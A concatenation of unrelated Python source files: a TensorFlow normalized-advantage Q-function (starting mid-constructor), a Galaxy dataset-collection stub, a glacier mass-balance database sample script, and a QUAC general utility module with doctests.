action_dim = env_spec.action_space.flat_dim
self._action_dim = action_dim
self._env_spec = env_spec
n_layers = len(hidden_sizes)
action_merge_layer = \
(action_merge_layer % n_layers + n_layers) % n_layers
with tf.variable_scope(name):
l_obs = L.InputLayer(shape=(None, env_spec.observation_space.flat_dim), name="obs")
l_action = L.InputLayer(shape=(None, env_spec.action_space.flat_dim), name="actions")
l_policy_mu = L.InputLayer(shape=(None, action_dim), name="policy_mu")
l_policy_sigma = L.InputLayer(shape=(None, action_dim, action_dim), name="policy_sigma")
l_hidden = l_obs
idx = 0
l_hidden_kwargs = dict(
W=hidden_W_init,
b=hidden_b_init,
nonlinearity=hidden_nonlinearity,
)
l_output_kwargs = dict(
W=output_W_init,
b=output_b_init,
)
while idx < action_merge_layer:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
_idx = idx
_l_hidden = l_hidden
# compute L network
while idx < n_layers:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="L_h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
l_L = L.DenseLayer(
l_hidden,num_units=action_dim**2, nonlinearity=None,
name="L_h%d" % (idx + 1), **l_output_kwargs,)
# compute V network
idx = _idx
l_hidden = _l_hidden
while idx < n_layers:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="V_h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
l_V = L.DenseLayer(
l_hidden,num_units=1, nonlinearity=None,
name="V_h%d" % (idx + 1), **l_output_kwargs,)
# compute mu network
idx = _idx
l_hidden = _l_hidden
while idx < n_layers:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="mu_h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
if bn: l_hidden = L.batch_norm(l_hidden)
l_mu = L.DenseLayer(
l_hidden,num_units=action_dim, nonlinearity=tf.nn.tanh,
name="mu_h%d" % (idx + 1), **l_output_kwargs,)
L_var, V_var, mu_var = L.get_output([l_L, l_V, l_mu], deterministic=True)
V_var = tf.reshape(V_var, (-1,))
# compute advantage
L_mat_var = self.get_L_sym(L_var)
P_var = self.get_P_sym(L_mat_var)
A_var = self.get_A_sym(P_var, mu_var, l_action.input_var)
# compute Q
Q_var = A_var + V_var
# compute expected Q under Gaussian policy
e_A_var = self.get_e_A_sym(P_var, mu_var, l_policy_mu.input_var, l_policy_sigma.input_var)
e_Q_var = e_A_var + V_var
self._f_qval = tensor_utils.compile_function([l_obs.input_var, l_action.input_var], Q_var)
self._f_e_qval = tensor_utils.compile_function([l_obs.input_var, l_policy_mu.input_var,
l_policy_sigma.input_var], e_Q_var)
self._L_layer = l_L
self._V_layer = l_V
self._mu_layer = l_mu
self._obs_layer = l_obs
self._action_layer = l_action
self._policy_mu_layer = l_policy_mu
self._policy_sigma_layer = l_policy_sigma
self._output_nonlinearity = output_nonlinearity
self.init_policy()
LayersPowered.__init__(self, [l_L, l_V, l_mu])
def init_policy(self):
pass
def get_L_sym(self, L_vec_var):
L = tf.reshape(L_vec_var, (-1, self._action_dim, self._action_dim))
return tf.matrix_band_part(L, -1, 0) - \
tf.matrix_diag(tf.matrix_diag_part(L)) + \
tf.matrix_diag(tf.exp(tf.matrix_diag_part(L)))
def get_P_sym(self, L_mat_var):
return tf.matmul(L_mat_var, tf.matrix_transpose(L_mat_var))
def get_e_A_sym(self, P_var, mu_var, policy_mu_var, policy_sigma_var):
e_A_var1 = self.get_A_sym(P_var, mu_var, policy_mu_var)
e_A_var2 = - 0.5 * tf.reduce_sum(tf.matrix_diag_part(
tf.matmul(P_var, policy_sigma_var)), 1)
#e_A_var2 = - 0.5 * tf.trace(tf.matmul(P_var, policy_sigma_var))
return e_A_var1 + e_A_var2
def get_A_sym(self, P_var, mu_var, action_var):
delta_var = action_var - mu_var
delta_mat_var = tf.reshape(delta_var, (-1, self._action_dim, 1))
P_delta_var = tf.squeeze(tf.matmul(P_var, delta_mat_var),[2])
return -0.5 * tf.reduce_sum(delta_var * P_delta_var, 1)
def get_qval(self, observations, actions):
qvals = self._f_qval(observations, actions)
return qvals
def get_output_sym(self, obs_var, **kwargs):
L_var, V_var, mu_var = L.get_output(
[self._L_layer, self._V_layer, self._mu_layer],
{self._obs_layer: obs_var},
**kwargs
)
V_var = tf.reshape(V_var, (-1,))
return L_var, V_var, mu_var
def _get_qval_sym(self, obs_var, action_var, **kwargs):
L_var, V_var, mu_var = self.get_output_sym(obs_var, **kwargs)
L_mat_var = self.get_L_sym(L_var)
P_var = self.get_P_sym(L_mat_var)
A_var = self.get_A_sym(P_var, mu_var, action_var)
Q_var = A_var + V_var
return Q_var, A_var, V_var
def get_qval_sym(self, obs_var, action_var, **kwargs):
return self._get_qval_sym(obs_var, action_var, **kwargs)[0]
def get_e_qval(self, observations, policy):
if isinstance(policy, StochasticPolicy):
agent_info = policy.dist_info(observations)
mu, log_std = agent_info['mean'], agent_info["log_std"]
std = np.array([np.diag(x) for x in np.exp(log_std)], dtype=log_std.dtype)
qvals = self._f_e_qval(observations, mu, std)
else:
actions, _ = policy.get_actions(observations)
qvals = self.get_qval(observations, actions)
return qvals
def get_e_qval_sym(self, obs_var, policy, **kwargs):
if isinstance(policy, StochasticPolicy):
agent_info = policy.dist_info_sym(obs_var)
mu, log_std = agent_info['mean'], agent_info["log_std"]
std = tf.matrix_diag(tf.exp(log_std))
L_var, V_var, mu_var = self.get_output_sym(obs_var, **kwargs)
L_mat_var = self.get_L_sym(L_var)
P_var = self.get_P_sym(L_mat_var)
A_var = self.get_e_A_sym(P_var, mu_var, mu, std)
qvals = A_var + V_var
else:
mu = policy.get_action_sym(obs_var)
qvals = self.get_qval_sym(obs_var, mu, **kwargs)
return qvals
def get_cv_sym(self, obs_var, action_var, policy, **kwargs):
#_, avals, _ = self._get_qval_sym(obs_var, action_var, **kwargs)
qvals = self.get_qval_sym(obs_var, action_var, **kwargs)
e_qvals = self.get_e_qval_sym(obs_var, policy, **kwargs)
avals = qvals - e_qvals
return avals
|
from galaxy import exceptions
from abc import ABCMeta
from abc import abstractmethod
from galaxy import model
import logging
log = logging.getLogger( __name__ )
class DatasetCollectionType(object):
__metaclass__ = ABCMeta
@abstractmethod
def generate_elements( self, dataset_instances ):
""" Generate DatasetCollectionElements with corresponding
to the supplied dataset instances or throw exception if
this is not a valid collection of the specified type.
"""
class BaseDatasetCollectionType( DatasetCollectionType ):
def _validation_failed( self, message ):
raise exceptions.ObjectAttributeInvalidException( message )
|
'''
Created on 12.07.2018
@author: yvo
Sample script showing polymorphistic approach to retrieve attribute
data of glaciers from the database.
'''
import configparser
import inspect
import sys
from dataflow.DataReaders.DatabaseReaders.GlacierReader import GlacierReader
from dataflow.DataReaders.DatabaseReaders.VolumeChangeReader import VolumeChangeReader
from dataflow.DataReaders.DatabaseReaders.LengthChangeReader import LengthChangeReader
from dataflow.DataReaders.DatabaseReaders.MassBalanceReader import MassBalanceReader
def printMassBalanceDataFrames(glaciers):
for glacier in glaciers.values():
print("---")
print(glacier)
# Check the availability of mass-balance object for inspection and printing the data-frame.
if len(glacier.massBalances.values()):
print("Available columns and their documentations:")
for column in list(glacier.massBalanceDataFrame):
docColumn = "Documentation not available yet"
# TODO: Getting the doc string of the columns of the data frame by inspecting the members of a MassBalance object.
print("- {0}: {1}".format(column, docColumn))
print(glacier.massBalanceDataFrame)
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read("dataflow.cfg")
privateDatabaseAccessConfiguration = r".\databaseAccessConfiguration.gldiro.cfg"
print(privateDatabaseAccessConfiguration + ' will be used to access the databse')
focusGlaciers = ['C14-10', 'B36-26', 'B83-03'] # Basodino (VAW-ID = 104), Aletsch (VAW-ID = 5), Corbassiere (VAW-ID = 38)
# Getting the dataflow.DataReaders.DatabaseReaders.GlacierReader ready to retrieve glacier objects from the database.
glacierReader = GlacierReader(privateDatabaseAccessConfiguration)
# Empty directory for the found focus glaciers.
glaciers = dict()
# Getting all the data readers for the attribute values of the glaciers ready.
dataReaders = []
dataReaders.append(MassBalanceReader(privateDatabaseAccessConfiguration))
try:
# Check if the database is available. If not, get alternative glaciers for plotting.
if glacierReader.isDatabaseAvailable == True:
print("The GLAMOS database is available. Glacier objects are read from the database.")
for focusGlacier in focusGlaciers:
glacierFound = glacierReader.getGlacierBySgi(focusGlacier)
glaciers[glacierFound.pkSgi] = glacierFound
# Getting the attributes from the database.
for glacier in glaciers.values():
# Polymorphistic approach to read attribute data by a list of readers.
for dataReader in dataReaders:
dataReader.getData(glacier)
# Printing the pandas.DataFrame of the mass-balances of the glaciers.
printMassBalanceDataFrames(glaciers)
else:
print("Database not available! Application will terminate.")
sys.exit(2)
except Exception as e:
print(e.message)
print("Sample script aborted!")
|
# -*- coding: utf-8 -*-
'''
Utility routines, classes, etc. A catch-all.
BUGS / WARNINGS / FIXME:
* This module keeps references to the config and logger objects it returns,
and then uses them, so the caller should take care to not somehow acquire
different ones.'''
# Copyright (c) Los Alamos National Security, LLC, and others.
import argparse
import codecs
import collections
import configparser
import cProfile
from datetime import datetime, timedelta
import distutils.spawn
import glob
import gzip
import functools
import inspect
import io
import itertools
import heapq
import logging
import os
import os.path
import pickle
import platform
from pprint import pprint
import psutil
import pytz
import random
import re
import resource
import shlex
import socket
import subprocess
import sys
import time
import urllib.parse
import uuid
import numpy as np
import multicore
import testable
### Constants ###
PICKLE_SUFFIX = '.pkl.gz'
WGS84_SRID = 4326 # FIXME: redundantly defined in geo/srs.py
CONFIG_DEFAULT = os.path.expanduser('~/.quacrc')
### Globals ###
# These are set to real values on import (i.e., below), so you can do
# something like:
#
# import u
# c = u.c
# l = u.l
c = None # config object; set after class def and populated in configure()
l = None # logging object; see EOF for default
cpath = None # path of configuration file on the command line
# Root of QUAC installation (set below since we need module_dir)
quacbase = None
# A random number generator with known seed. Re-seeded in parse_args().
rand = random.Random(8675309)
rand_np = np.random.mtrand.RandomState(8675309)
# Used for silencing stdout; see stdout_silence() below.
stdout_copy_fno = None
# Python apparently doesn't set the locale correctly on stdout when it's a
# pipe, so this hack gives us a file object that can print UTF8 to stdout
# regardless.
utf8_stdout = codecs.getwriter('utf8')(sys.stdout)
# Should chatter be verbose? Set in parse_args().
verbose = False
# Should chatter include timestamps? Set in parse_args().
log_timestamps = True
### Environment ###
# We require a minimum Python version.
assert (sys.version_info >= (3,4))
# Use a consistent, widely available, boring locale.
os.environ['LC_ALL'] = 'C'
# Some parts of QUAC need lots of files open.
fl = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (2048, fl[1]))
### Classes ###
class Accumulator(object):
'''Memory-efficient class which accumulates a sum and can compute its mean.
There is also a threshold for minimum number of items before mean
becomes non-zero. For example:
>>> a = Accumulator(min_count=3)
>>> a.mean
0.0
>>> a.add(1)
>>> a.add(2)
>>> a.mean
0.0
>>> a.add(3)
>>> a.sum_
6.0
>>> a.count
3
>>> a.mean
2.0'''
__slots__ = ('sum_', 'count', 'min_count')
def __init__(self, sum_=0.0, count=0, min_count=1):
self.sum_ = sum_
self.count = count
self.min_count = min_count
@property
def mean(self):
if (self.count < self.min_count):
return 0.0
else:
return (self.sum_/self.count)
def add(self, x):
self.sum_ += x
self.count += 1
class ArgumentParser(argparse.ArgumentParser):
'''Add a few arguments common to all QUAC scripts. A group called
"functionality" is available in .default_group; an additional group of
common options is added at the end in parse_args().'''
def __init__(self, **kw):
kw.update({ 'add_help': False,
'formatter_class': argparse.RawTextHelpFormatter })
super(ArgumentParser, self).__init__(**kw)
self.default_group = self.add_argument_group('functionality')
def parse_args(self, args):
gr = self.add_argument_group('generic options')
gr.add_argument(
'-h', '--help',
action='help',
help='show this help message and exit')
gr.add_argument(
'--config',
metavar='FILE',
help='configuration file')
gr.add_argument(
'--notimes',
action='store_true',
help='omit timestamps from log messages (useful for testing)')
gr.add_argument(
'--unittest',
nargs=0,
action=testable.Raise_Unittest_Exception,
help='run unit tests instead of doing real stuff')
gr.add_argument(
'--verbose',
action='store_true',
help='be more verbose with log output')
return super(ArgumentParser, self).parse_args(args)
class MyConfigParser(configparser.SafeConfigParser):
def getpath(self, section, key, rel_file=None):
'''Return absolutized version of path at key; if specified, the path is
relative to rel_file, otherwise it's relative to the configuration
file.'''
if (rel_file is None):
rel_file = cpath
return abspath(self.get(section, key), rel_file)
def getlist(self, section, key):
return self.get(section, key).split()
c = MyConfigParser(inline_comment_prefixes=['#'])
class Priority_Queue(object):
'''Priority queue with bounded size.
Create and add first three items:
>>> pq = Priority_Queue(3)
>>> pq
PQ(3, [])
>>> len(pq)
0
>>> pq.add(1, 'a')
>>> pq
PQ(3, [(1, 'a')])
>>> len(pq)
1
>>> pq.add(3, 'b')
>>> pq.add(2, 'c')
>>> pq
PQ(3, [(1, 'a'), (3, 'b'), (2, 'c')])
>>> len(pq)
3
Higher-priority value goes in, lowest is removed:
>>> pq.add(4, 'd')
>>> pq
PQ(3, [(2, 'c'), (3, 'b'), (4, 'd')])
Lower-priority value never goes in:
>>> pq.add(1, 'e')
>>> pq
PQ(3, [(2, 'c'), (3, 'b'), (4, 'd')])
No pop operation yet, but you can iterate through the items in various
ways. Note that these are in arbitrary order, not priority order.
>>> list(pq.items())
[(2, 'c'), (3, 'b'), (4, 'd')]
>>> list(pq.priorities())
[2, 3, 4]
>>> list(pq.values())
['c', 'b', 'd']
Two queues can be merged into a new queue if their limits are the same.
This keeps the maximum priority items.
>>> pq2 = Priority_Queue(2)
>>> pq.merge(pq2)
Traceback (most recent call last):
...
ValueError: cannot merge queues with different limits
>>> pq3 = Priority_Queue(3)
>>> pq3.add(3, 'e')
>>> pq3.add(5, 'f')
>>> pq3
PQ(3, [(3, 'e'), (5, 'f')])
>>> pq.merge(pq3)
PQ(3, [(3, 'b'), (4, 'd'), (5, 'f')])
Unlimited also an option (limit becomes sys.maxsize):
>>> Priority_Queue()
PQ(9223372036854775807, [])
It's OK if items can't be compared. Many NumPy and Pandas data types
have this property. (Note the strange exception when we try; see
<http://stackoverflow.com/questions/32342292/> for an explanation.)
>>> a = np.arange(2)
>>> b = np.arange(2)
>>> (1, a) > (1, pq)
Traceback (most recent call last):
...
ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
>>> pq = Priority_Queue(3)
>>> pq.add(1, a)
>>> pq.add(1, b)
Limit must be at least 1:
>>> Priority_Queue(1)
PQ(1, [])
>>> Priority_Queue(0)
Traceback (most recent call last):
...
ValueError: limit 0 is not greater than zero
>>> Priority_Queue(-1)
Traceback (most recent call last):
...
ValueError: limit -1 is not greater than zero'''
# Items can be non-comparable, so we need a tie-breaker. The simple
# solution (recommended by the heapq docs) is to simply count queue
# insertions; however, in our case, this breaks down because we need to be
# able to merge queues. So, we use a hack based on low bits of the MAC
# address and PID to grope towards uniqueness. This assumes 64-bit integers
# and 16-bit PIDs, and all queues in the same process use the same
# sequence.
add_ct = ( os.getpid() << 48
^ (uuid.getnode() & 0xffffffff) << 32)
def __init__(self, limit=None):
self.heap = list()
if (limit is None):
self.limit = sys.maxsize
elif (limit <= 0):
raise ValueError('limit %d is not greater than zero' % limit)
else:
self.limit = limit
def __len__(self):
return len(self.heap)
def __repr__(self):
return 'PQ(%d, %s)' % (self.limit, repr(list(self.items())))
def add(self, priority, value):
assert (len(self.heap) <= self.limit)
# Silently ignore NaN priorities, because they can't be ordered.
if (np.isnan(priority)):
return
if (len(self.heap) == self.limit):
# Queue full. This insertion is a no-op if the priority is below
# everything already on the heap (I looked at the source code).
heapq.heappushpop(self.heap, (priority, self.add_ct, value))
else:
# Queue not full.
#print(len(self.heap), priority, item)
heapq.heappush(self.heap, (priority, self.add_ct, value))
self.add_ct += 1
def items(self):
return ((p, v) for (p, t, v) in self.heap)
def merge(self, other):
if (self.limit != other.limit):
raise ValueError('cannot merge queues with different limits')
new = self.__class__(self.limit)
new.heap = heapq.nlargest(self.limit,
itertools.chain(self.heap, other.heap),
key=lambda pv: pv[0])
new.heap.reverse()
# new.heap is now sorted (see heapq.nlargest() docs), so it's also a
# heap and we need not heapq.heapify().
return new
def priorities(self):
return (p for (p, t, v) in self.heap)
def values(self):
return (v for (p, t, v) in self.heap)
class Profiler(object):
def __init__(self):
self.prof = cProfile.Profile()
self.prof.enable()
def stop(self, name):
self.prof.disable()
self.prof.dump_stats(name)
class defaultdict_recursive(collections.defaultdict):
'''defaultdict which autovivifies arbitrarily deeply. For example:
>>> a = defaultdict_recursive()
>>> a[1][1] = 1
>>> a[1][2][3] = 2
>>> pprint(a.keys())
dict_keys([1])
>>> pprint(a[1].keys())
dict_keys([1, 2])
>>> a[1][1]
1
>>> a[1][2][3]
2'''
# https://groups.google.com/forum/?fromgroups#!topic/comp.lang.python/lRnIhaJKZeo[1-25]
def __init__(self):
self.default_factory = type(self)
def as_dict(self):
'Return self as a regular dict. Useful if you are done autovifivying.'
return { k: v.as_dict() if isinstance(v, type(self)) else v
for (k, v) in self.items() }
class Deleted_To_Save_Memory(object):
'Placeholder for objects removed to save memory, to make errors clearer.'
pass
class Lock_Error(Exception):
"Raised when a lock can't be acquired."
pass
class No_Configuration_Read(Exception):
'Raised when the location of the config file is needed, but none was read.'
pass
### Functions ###
def abort(text, exc_info=False):
"""Log a fatal error and abort immediately. exc_info is interpreted as for
the logging functions; see
http://docs.python.org/library/logging.html#logging.debug. TLDR: pass
True and the function will figure out what the current exception is and
log a traceback."""
l.fatal(text, exc_info=exc_info)
sys.exit(1)
def abspath(path, rel_file=None):
'''Return an absolute version of (non-empty) path. Relative paths are
relative to the location of file rel_file (which need not actually
exist); if rel_file is None, then path must be absolute already. For
example:
>>> abspath('../lib', '/usr/bin/foo')
'/usr/lib'
>>> abspath('/usr/lib/../include', '/usr/bin/foo')
'/usr/include'
>>> abspath('/usr/lib/../include')
'/usr/include'
>>> abspath('../lib')
Traceback (most recent call last):
...
ValueError: relative path ../lib requires referent
>>> abspath('')
Traceback (most recent call last):
...
ValueError: empty path is invalid'''
if (len(path) == 0):
raise ValueError('empty path is invalid')
if (rel_file is None and path[0] != '/'):
raise ValueError('relative path %s requires referent' % (path))
if (path[0] == '/'):
return os.path.abspath(path)
else:
return os.path.abspath('%s/%s' % (os.path.dirname(rel_file), path))
def class_by_name(name):
'''Return a class given its fully qualified name.'''
# http://stackoverflow.com/questions/452969
parts = name.split('.')
mname = '.'.join(parts[:-1])
try:
m = __import__(mname)
for p in parts[1:]:
m = getattr(m, p)
return m
except (AttributeError, ValueError) as x:
raise ValueError('Can\'t import "%s": %s' % (name, str(x)))
def call_kw(f, *args, **kwargs):
'''Call f and return its return value, passing args as well as the kwargs
which are actually valid for f; this lets you call f with an arbitrary
kwargs even if f doesn't allow arbitrary kwargs. For example:
>>> def f(a, b=1, c=2):
... return ('%d %d %d' % (a, b, c))
>>> call_kw(f, 3, b=4, c=5, d=6)
'3 4 5'
Warning: args is *not* checked for matching the function signature. It
is probably a bad idea to use this wrapper to call functions with a
non-trivial mix of args and kwargs.'''
argspec = inspect.getargspec(f)
valid_kwargs = set(argspec.args[-len(argspec.defaults):])
return f(*args, **{ k:v
for (k,v) in kwargs.items()
if k in valid_kwargs } )
def calling_module(frame_ct):
'''Return the module object frame_ct levels up in the stack. For example:
>>> calling_module(0)
<module 'u' from '.../lib/u.py'>
Note that what is frame_ct levels up must be a module, not a function or
something else. For example:
>>> calling_module(-1) # calling_module() itself
Traceback (most recent call last):
...
ValueError: stack level -1 is not a module
>>> calling_module(1) # somewhere in doctest
Traceback (most recent call last):
...
ValueError: stack level 1 is not a module'''
calling_frame = inspect.stack()[frame_ct+1][0]
try:
return sys.modules[calling_frame.f_locals['__name__']]
except KeyError:
raise ValueError('stack level %d is not a module' % (frame_ct))
def chunker(seq, p):
'''Split sequence seq into p more or less equal sized sublists. If p <
len(seq), then return len(seq) sublists of length 1. E.g.:
>>> chunker('abcdefghijklm', 3)
['abcde', 'fghi', 'jklm']
>>> chunker('abc', 4)
['a', 'b', 'c']
>>> chunker('', 1)
[]
See also groupn().'''
# based on http://code.activestate.com/recipes/425397
new = []
n = len(seq) // p # min items per subsequence
r = len(seq) % p # remaindered items
(b, e) = (0, n + min(1, r)) # first split
for i in range(min(p, len(seq))):
new.append(seq[b:e])
r = max(0, r-1) # use up remainders
(b, e) = (e, e + n + min(1, r)) # min(1,r) is always 0 or 1
return new
def config_read(filename):
'''Read the given configuration file. Abort with an error message if it
does not exist.'''
if (len(c.read(filename)) == 0):
abort('config file not found: %s' % (filename))
def configure(config_path):
"""Parse configuration files & return the config object; config_path is the
config file given on the command line. Also adjust the load path as
specified in the files."""
global cpath
config_read(abspath("../misc/default.cfg", __file__)) # 1. default.cfg
if (config_path is None):
if (os.path.exists(CONFIG_DEFAULT)):
config_read(CONFIG_DEFAULT)
else:
# this need to be an absolute path in case we change directories later
cpath = os.path.abspath(config_path)
config_read(cpath) # 2. from command line
next_config = c.get("path", "next_config")
if (next_config != ""):
assert False, "untested: if you need this, remove assertion & test :)"
config_read(next_config) # 3. chained from 2
return c
def copyupdate(template, updates):
'''Return a copy of dict template with updates applied. E.g.:
>>> a = {1:2, 3:4}
>>> copyupdate(a, {3:5, 5:6})
{1: 2, 3: 5, 5: 6}
>>> a
{1: 2, 3: 4}'''
r = template.copy()
r.update(updates)
return r
def dicts_merge(a, b):
'''Merge two dictionaries. If a key appears in both:
- If the values are:
- both mappings, they are merged recursively
- both lists, they are appended.
- equal, one or the other (arbitrarily) is used
- Otherwise, raise ValueError.
For example:
>>> pprint(dicts_merge({}, {}))
{}
>>> pprint(dicts_merge({1:2}, {}))
{1: 2}
>>> pprint(dicts_merge({1:2}, {3:4, 5:6}))
{1: 2, 3: 4, 5: 6}
>>> pprint(dicts_merge({1:{7:8}}, {1:{9:10}, 5:6}))
{1: {7: 8, 9: 10}, 5: 6}
>>> pprint(dicts_merge({1:[7,8]}, {1:[9,10], 5:6}))
{1: [7, 8, 9, 10], 5: 6}
>>> pprint(dicts_merge({1:2}, {1:2, 5:6}))
{1: 2, 5: 6}
>>> pprint(dicts_merge({1:2}, {1:4, 5:6}))
Traceback (most recent call last):
...
ValueError: Un-mergeable duplicate keys
>>> pprint(dicts_merge({1:{7:8}}, {1:4, 5:6}))
Traceback (most recent call last):
...
ValueError: Un-mergeable duplicate keys'''
c = dict()
keys = set(itertools.chain(a.keys(), b.keys()))
for k in keys:
if (k in a and k in b):
vals = (a[k], b[k])
if (all(isinstance(i, collections.abc.Mapping) for i in vals)):
c[k] = dicts_merge(a[k], b[k])
elif (all(isinstance(i, list) for i in vals)):
c[k] = a[k] + b[k]
elif (a[k] == b[k]):
c[k] = a[k]
else:
raise ValueError("Un-mergeable duplicate key %s: %s, %s"
% (k, a[k], b[k]))
elif (k in a):
c[k] = a[k]
else:
assert (k in b and not k in a)
c[k] = b[k]
return c
def domain():
'Return a guess at my domain name.'
return socket.getfqdn().split('.', 1)[1]
def glob_maxnumeric(dir_):
'''Given a directory that has zero or more files named only with digits,
return the largest integer in those filenames. If there are no such
filenames, return None.'''
names = glob.glob('%s/*' % (dir_))
r = re.compile(r'(^|/)([0-9]+)$')
try:
return max(int(m.group(2)) for m in (r.search(i) for i in names) if m)
except ValueError:
# no matches
return None
def groupn(iter_, n):
'''Generator which returns iterables containing n-size chunks of iterable
iter_; the final chunk may have size less than n (but not 0). Patterned
after <http://stackoverflow.com/a/3992918/396038>. E.g.:
>>> a = range(10)
>>> b = list(range(10))
>>> [list(i) for i in groupn(a, 3)]
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> [list(i) for i in groupn(b, 3)]
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> [list(i) for i in groupn(a, 5)]
[[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]
>>> [list(i) for i in groupn(a, 99999)]
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]]
See also chunker().'''
# FIXME: It is kind of lame that this returns lists. Any way we can return
# generators or iterables instead?
q = iter(iter_) # new iterator so we can "destructively" remove items
while True:
chunk = list(itertools.islice(q, 0, n))
if (len(chunk) == 0):
return
yield chunk
def intfloatpass(v):
'''Try to convert v to an int or float, in that order; if either succeeds,
return the result, else return v unchanged. For example:
>>> intfloatpass('1')
1
>>> intfloatpass('1.0')
1.0
>>> intfloatpass('1foo')
'1foo'
>>> intfloatpass({})
{}'''
try:
return int(v)
except ValueError:
try:
return float(v)
except ValueError:
return v
except TypeError:
return v
def lock_acquire(name):
'''Try to acquire the lock *name*. Only one process can have the lock at
once. Return immediately if the lock was acquired, otherwise raise
Lock_Error. In the latter case, there are no side effects. Locks must be
explicitly released with lock_release().'''
# FIXME: Better to do this with fcntl.lockf() or some third party library?
try:
os.mkdir(name + '.lock')
except OSError:
raise Lock_Error("can't acquire lock '%s'" % (name))
def lock_release(name):
'''Release the lock *name*. If the lock was not previously acquired, raise
an exception. (FIXME: You can currently release locks acquired by other
processes and delete unrelated directories.) See also lock_acquire().'''
os.rmdir(name + '.lock')
def logging_init(tag, file_=None, stderr_force=False, level=None,
verbose_=False, truncate=False):
'''Set up logging and return the logger object. The basic setup is that we
log to one of two different files and/or stderr:
1. If file_ is given, log there. Otherwise, log to the file in config
variable path.log. If both are given, abort with an error; if
neither, don't log to a file.
2. If sys.stderr is a TTY or stderr_force is True, then log to standard
error regardless of file logging. Otherwise, log to standard error if
there is no file log.
3. The default log level is INFO. If level is given, use that level
regardless of the following. If global variable verbose is set
(either because parse_args() did it in response to --verbose or the
verbose_ argument to this function is True), then use DEBUG.
4. If truncate is given, then truncate the log file before using it.
(Note this is only allowed for log_file_base.)
This function can be called more than once. Last call wins. Note that
truncations happens on each call!'''
if (verbose_):
global verbose
verbose = verbose_
if (level is None):
level = logging.DEBUG if verbose else logging.INFO
# Use "FATAL" instead of "CRITICAL" in logs
logging.addLevelName(50, 'FATAL')
global l
l = logging.getLogger('my_logger')
l.setLevel(level)
l.handlers = [] # delete existing handlers, to allow re-init.
# add tag string to permit logcheck filtering, which applies the same
# regexes to all files it's watching.
hostname = platform.node().split('.')[0]
pid = os.getpid()
fmt = '%s %%(levelname)-8s %%(message)s' % tag
if (log_timestamps):
fmt = '%%(asctime)s %s[%d] %s' % (hostname, pid, fmt)
form = logging.Formatter(fmt, '%Y-%m-%d_%H:%M:%S')
# file logger
try:
# FIXME: this is a sloppy test for whether a config file was read and
# path.log is available. We used to test whether c was None, but then
# importers can't say "c = u.c".
if (c.get('path', 'log') == ''):
file_ = None
else:
file_c = path_configured(c.getpath('path', 'log'))
assert (file_ is None)
assert (not truncate)
file_ = file_c
except (No_Configuration_Read, configparser.NoSectionError):
# path.log not configured, but that's OK
pass
if (file_ is not None):
if (truncate):
open(file_, 'w').close()
flog = logging.FileHandler(file_)
flog.setLevel(level)
flog.setFormatter(form)
l.addHandler(flog)
# console logger
#
# FIXME: We test that sys.stderr has isatty() because under Disco,
# sys.stderr is a MessageWriter object which does not have the method. Bug
# reported: https://github.com/discoproject/disco/issues/351
if (stderr_force
or (hasattr(sys.stderr, 'isatty') and sys.stderr.isatty())
or file_ is None):
clog = logging.StreamHandler(sys.stderr)
clog.setLevel(level)
clog.setFormatter(form)
l.addHandler(clog)
return l
def memoize(f):
'''Decorator that memoizes a function; i.e., if the function is called
again with the same arguments, the cached value is returned and the
function is not really called. Resettable. Fails with TypeError if you
pass an unhashable argument. Can't wrap functions that take keyword
arguments. For example:
>>> import random
>>> r = random.Random(1)
>>> @memoize
... def f(x):
... return (x * r.randint(0, 10**9))
>>> f(1)
144272509
>>> f(1)
144272509
>>> f.reset()
>>> f(1)
611178002
(Note that the above should work for plain functions too, but it's a
class method because doctest is getting confused.)'''
# Adapted <http://wiki.python.org/moin/PythonDecoratorLibrary#Memoize>.
# This uses some weird voodoo I don't quite understand.
f.cache = dict()
def reset():
# for some reason f.cache = dict() doesn't stick
f.cache.clear()
f.reset = reset
@functools.wraps(f)
def wrapper(*args):
if (args not in f.cache):
f.cache[args] = f(*args)
return f.cache[args]
return wrapper
def memory_use():
'''Return the amount of memory currently allocated to this process, in bytes,
as a tuple of virtual memory (VMS), real memory (RSS). For example (note
flexibility in results to accommodate different operating systems):
>>> a = 'a' * int(2e9) # string 2 billion chars long
>>> 2e9 < memory_use()[0] < 5e9
True
>>> 2e9 < memory_use()[1] < 3e9
True
>>> del a
Note: This used to have an option to get peak usage, in addition to
current usage. However, Macs seem not to be able to do this, and since
it's not critical information for our uses, that feature was removed.'''
info = psutil.Process(os.getpid()).memory_info()
return (info.vms, info.rss)
def memory_use_log(detail='', level=None):
if (detail):
detail = ' %s: ' % (detail)
if (level is None):
# l.debug is not defined at def time
level = l.debug
(vms, rss) = memory_use()
level('memory:%s vms=%s rss=%s' % (detail, fmt_bytes(vms), fmt_bytes(rss)))
def mkdir_f(path):
'''Ensure that directory path exists. That is, if path already exists and
is a directory, do nothing; otherwise, try to create directory path (and
raise appropriate OSError if that doesn't work.)'''
if (not os.path.isdir(path)):
os.mkdir(path)
def module_dir(m=None):
"""Return the directory containing the file defining module m. If m is None
(the default), return the directory containing the calling module. For
example:
>>> u_module = calling_module(0)
>>> module_dir(u_module)
'.../lib'
>>> module_dir()
'.../lib'"""
if (m is None):
m = calling_module(1)
return os.path.abspath(os.path.dirname(m.__file__))
def mpi_available_p():
'''Return True if MPI (including mpirun) is avilable in a SLURM allocation,
False otherwise.'''
return bool('SLURM_NODELIST' in os.environ
and distutils.spawn.find_executable('mpirun'))
